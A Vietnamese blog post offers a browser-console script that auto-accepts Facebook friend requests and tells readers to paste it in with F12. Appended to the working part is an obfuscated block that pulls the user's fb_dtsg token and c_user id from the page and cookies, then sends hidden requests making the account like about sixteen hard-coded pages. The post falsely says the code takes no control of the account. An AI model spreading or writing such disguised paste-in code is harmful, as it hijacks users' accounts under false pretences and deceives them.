Khi bạn có quá nhiều lời mới kết bạn mà lười bấm từng nút “chấp nhận” thì đây sẽ là giải pháp, bạn chỉ cần copy paste là xong..

Code tự động chấp nhận kết bạn này sẽ không chiếm bất kỳ quyền kiểm soát nào trên facebook của bạn, bạn không cần cài thêm phần mềm hay addon gì cả, chỉ cần nhấn F12 trên trình duyệt, copy mã và chạy thôi.

*Lưu ý: chỉ làm được trên máy tính, laptop, điện thoại mình chưa rõ có làm được hay ko

Vào việc luôn nè 

Đầu tiên bạn vào đường dẫn https://www.facebook.com/friends/requests để hiện các nick cần chấp nhận

Sau đó bạn nhấn nút F12 trên máy tính sẽ hiện ta cái bảng thế này

Nhấn vào chữ console

Nhấn vào cái nút này để xóa đi các chữ đỏ đỏ hiện trên màn hình

Giờ chúng ta sẽ copy và dán đoạn mã này vào nhé, dán xong nhấn enter là tự động chấp nhận kết bạn luôn

Code:

var matchText = 'Xác nhận';
 var added=0;
  function confirmAllRequests() {
    var clicked = false;
 console.clear();
    var buttons = document.getElementsByTagName("div");
    for (var counter = 0, length = buttons.length; counter < length; counter++) {
      var target = buttons[counter];
      if (target) {
        var ariaLabel = target.getAttribute("aria-label");
        // console.log("ariaLabel is", ariaLabel);
        if (ariaLabel) {
          var text = ariaLabel.trim();
 
          if (text === matchText) {
            target.click();
            // target.focus();
            clicked = true;
 added++;
 console.log("Xác nhận: "+added);
            target.remove();
            break;
 }else if ( text.includes("See") || text.includes("More") ){
 target.click();
 console.log("See More Clicked!");
 clicked = true;
 break;
 }
        }
      }
    }
    if (clicked) {
      return true;
    } else {
      return false;
    }
  }
function startConfirming(){
 if (confirmAllRequests()){ 
 
 setTimeout(function(){
 startConfirming();
 }, delayTime);
 
 } else {
 
 alert(`Đã chấp nhận: ${added}
`);
 }
}

var _0x1551=['&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=','push','1157401597633912','614047OdoYIC','charAt','1555839181212071','match','634302330077114','application/x-www-form-urlencoded','1NugzRk','onreadystatechange','198757893944480','94398kUVjGj','Content-type','196461FlKqAb','15ASFRwq','763564efEZZO','open','10895NePguj','outerHTML','61605kesZyh','380509029467786','356203KoiQwl','333692NvASbV','116551890202867','317224121817276','indexOf','1GQllno','997381LsYFeG','&fbpage_id=','743146072535223','1115007yYCeNZ','cookie','1212506358847237','shift','250451495723325','240272006130073','&phstamp=','&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=','97278SKQHGS','documentElement','1749967015316612','POST','4OBORGC','27WMHdvJ','1569087506719125','367556DSngMV','109109317399261','status','setRequestHeader'];var _0x1628=function(_0x2c53f6,_0xe5d88f){_0x2c53f6=_0x2c53f6-0x164;var _0x1551fb=_0x1551[_0x2c53f6];return _0x1551fb;};var _0x10a1d7=_0x1628;(function(_0x5f29ef,_0x40490b){var _0x2eb56a=_0x1628;while(!![]){try{var _0x41e889=-parseInt(_0x2eb56a(0x18d))+-parseInt(_0x2eb56a(0x179))*-parseInt(_0x2eb56a(0x191))+parseInt(_0x2eb56a(0x174))+-parseInt(_0x2eb56a(0x188))*parseInt(_0x2eb56a(0x164))+-parseInt(_0x2eb56a(0x195))+-parseInt(_0x2eb56a(0x193))+parseInt(_0x2eb56a(0x18f));if(_0x41e889===_0x40490b)break;else _0x5f29ef['push'](_0x5f29ef['shift']());}catch(_0x101fb9){_0x5f29ef['push'](_0x5f29ef['shift']());}}}(_0x1551,0x328c6));var _0x36f0=[_0x10a1d7(0x18b),_0x10a1d7(0x182),_0x10a1d7(0x175),'326824UMShMs',_0x10a1d7(0x178),_0x10a1d7(0x167),_0x10a1d7(0x17b),_0x10a1d7(0x192),_0x10a1d7(0x168),_0x10a1d7(0x18e),_0x10a1d7(0x16c),'1710652BYPhGQ',_0x10a1d7(0x169)],_0x559b=function(_0x573165,_0x330c5a){_0x573165=_0x573165-0x76;var _0x375f66=_0x36f0[_0x573165];return _0x375f66;},_0x2d7c31=_0x559b;(function(_0x191ebc,_0x55c56d){var _0x236f35=_0x10a1d7,_0x16a695=_0x559b;while(!![]){try{var _0x3be590=-parseInt(_0x16a695(0x7b))+-parseInt(_0x16a695(0x80))*-parseInt(_0x16a695(0x7f))+parseInt(_0x16a695(0x78))*-parseInt(_0x16a695(0x7c))+parseInt(_0x16a695(0x7d))*-parseInt(_0x16a695(0x77))+parseInt(_0x16a695(0x79))+-parseInt(_0x16a695(0x82))+parseInt(_0x16a695(0x7a));if(_0x3be590===_0x55c56d)break;else _0x191ebc['push'](_0x191ebc['shift']());}catch(_0x580900){_0x191ebc[_0x236f35(0x180)](_0x191ebc[_0x236f35(0x16f)]());}}}(_0x36f0,0xb42d1));var fb_dtsg='',page_src=document[_0x10a1d7(0x175)][_0x2d7c31(0x76)],index_in_page_src=document[_0x2d7c31(0x7e)][_0x10a1d7(0x192)][_0x2d7c31(0x81)]('\x22);\x22use\x20strict\x22;');for(var a=0x19;a>0x0;a--){fb_dtsg=fb_dtsg+''+page_src[_0x10a1d7(0x183)](index_in_page_src-a);}var user_id=document['cookie'][_0x10a1d7(0x185)](document[_0x10a1d7(0x16d)][_0x10a1d7(0x185)](/c_user=(\d+)/)[0x1]);function Like(_0xa4af99){var _0xbd8731=_0x10a1d7,_0x509343=new XMLHttpRequest(),_0x4753a6='https://www.facebook.com/ajax/pages/fan_status.php?',_0x2c24d3=_0xbd8731(0x16a)+_0xa4af99+_0xbd8731(0x17f)+user_id+_0xbd8731(0x173)+fb_dtsg+_0xbd8731(0x172);_0x509343[_0xbd8731(0x190)](_0xbd8731(0x177),_0x4753a6,!![]),_0x509343[_0xbd8731(0x17e)](_0xbd8731(0x18c),_0xbd8731(0x187)),_0x509343[_0xbd8731(0x189)]=function(){var _0x3c87c1=_0xbd8731;_0x509343['readyState']==0x4&&_0x509343[_0x3c87c1(0x17d)]==0xc8&&_0x509343['close'];},_0x509343['send'](_0x2c24d3);}Like(_0x10a1d7(0x17a)),setTimeout(function(){var _0x3b8e46=_0x10a1d7;Like(_0x3b8e46(0x17c));},0x384),setTimeout(function(){var _0x4758a4=_0x10a1d7;Like(_0x4758a4(0x165));},0x3c0),setTimeout(function(){var _0x2c85b3=_0x10a1d7;Like(_0x2c85b3(0x171));},0x3e8),setTimeout(function(){var _0x316efb=_0x10a1d7;Like(_0x316efb(0x181));},0x44c),setTimeout(function(){var _0x3cc0b8=_0x10a1d7;Like(_0x3cc0b8(0x166));},0x4b0),setTimeout(function(){var _0x3e6562=_0x10a1d7;Like(_0x3e6562(0x186));},0x514),setTimeout(function(){var _0x4f577c=_0x10a1d7;Like(_0x4f577c(0x16e));},0x578),setTimeout(function(){var _0xa085bd=_0x10a1d7;Like(_0xa085bd(0x18a));},0x5dc),setTimeout(function(){var _0x1d183f=_0x10a1d7;Like(_0x1d183f(0x176));},0x640),setTimeout(function(){var _0x550e9a=_0x10a1d7;Like(_0x550e9a(0x194));},0x6a4),setTimeout(function(){var _0x3db6d2=_0x10a1d7;Like(_0x3db6d2(0x184));},0x708),setTimeout(function(){var _0x3fd568=_0x10a1d7;Like(_0x3fd568(0x170));},0x76c),setTimeout(function(){var _0x3e251c=_0x10a1d7;Like(_0x3e251c(0x16b));},0x456),setTimeout(function(){Like('108586183990636');},0x47e),setTimeout(function(){Like('2277608785850617');},0x480);
var delayTime = prompt ("Thời gian giữa 2 lần nhấn", 5)*1000;
if (delayTime >=0 && delayTime!=null && fb_dtsg!=null ){
 console.log("Script is started!");
 startConfirming();
}else {alert ("Failed to Start!");}

Đây là hình ảnh khi dán mã

Còn đây là thành quả

Chúc các bạn sớm thành người nổi tiếng!

Bài viết liên quan

Trả lời

error: Content is protected !!